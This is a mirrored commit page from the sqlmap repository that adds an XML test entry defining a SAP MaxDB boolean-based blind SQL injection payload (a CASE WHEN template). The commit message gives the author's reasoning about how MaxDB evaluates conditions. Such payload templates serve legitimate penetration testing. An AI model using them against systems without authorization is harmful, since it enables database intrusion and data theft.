mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-24 07:30:50 +03:00
MaxDB always precalculates values for both TRUE and FALSE, hence we can't trick him to run any "faulty" command (e.g. 1/0). This payload is fairly ok because in case of FALSE --> something=NULL is always NULL
This commit is contained in:
parent
08697e60a9
commit
ff9080de48
|
@ -745,7 +745,25 @@ Formats:
|
||||||
<dbms>Microsoft Access</dbms>
|
<dbms>Microsoft Access</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
<!-- TODO: check against SAP MaxDB -->
|
|
||||||
|
<test>
|
||||||
|
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,3</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>SAP MaxDB</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!-- End of boolean-based blind tests - Parameter replace -->
|
<!-- End of boolean-based blind tests - Parameter replace -->
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user